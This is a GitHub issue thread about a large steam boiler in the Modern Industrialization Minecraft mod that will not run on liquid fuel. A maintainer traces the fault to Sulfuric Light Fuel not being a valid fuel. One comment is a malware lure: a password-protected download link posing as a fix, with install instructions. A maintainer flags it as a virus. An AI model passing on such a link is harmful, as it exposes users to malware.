### ISSUE TITLE
Large Steam Boiler not Firing with Liquid Fuels

### ISSUE THREAD

**Issue by TakumiSF** [AztechMC/Modern-Industrialization#859]
Setup Oil Drilling Rig, setup Advanced large steam boiler with 2 steel fluid input hatches (water and liquid fuel), and 1 fluid output hatch. Shape is valid, but when supplied fuel and water, it does not fire and produce steam.

If I am doing something wrong it is not very clear in the guide book.

1.20.1 Version

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Swedz** [comment]
I'm not able to reproduce this issue. What fluid fuel are you using? Provide some screenshots

**Comment by Swedz** [comment]
~~Do not click the above link. That is a virus.~~ The comment was deleted :)

**Comment by TakumiSF** [comment]
Hi Swedz!

Ive attached some screenshots here, Im using Sulfuric Light Fuel on my survival world, but I have tried all the other fuel variants on my creative setup, to no avail. Is there possibly something in a config server side I would need to change?

The steam in the tank is from trying to get it up to temp with coal coke first btw!

Thanks in advance for your help, and your quick response!

![2024-09-01_18 51 21](https://github.com/user-attachments/assets/6131d360-a759-4731-814d-1447e65a7914)
![2024-09-01_18 51 26](https://github.com/user-attachments/assets/0486ed12-f80d-4198-b9f5-5c85178e3826)
![2024-09-01_18 51 35](https://github.com/user-attachments/assets/8e96cdc3-6c44-4f21-a485-ced370ef9e06)
![2024-09-01_18 51 37](https://github.com/user-attachments/assets/f0cd5c2c-2de4-41a9-b2ba-12998e58d119)
![2024-09-01_18 51 45](https://github.com/user-attachments/assets/6d57c639-5903-4d23-9c35-b465d3016085)

**Comment by Swedz** [comment]
I'm unable to check at this very moment, but I'm pretty sure that Sulfuric Light Fuel is not a fluid fuel. Light Fuel is. Double check on the recipe tab for Fluid Fuels.

**Comment by Swedz** [comment]
I just checked, and yes, Sulfuric Light Fuel is not a fuel. Only fuels listed under the "Fluid Fuels" tab in JEI/REI/EMI are acceptable fuels for large boilers, diesel generators, and diesel tools. This issue can be closed
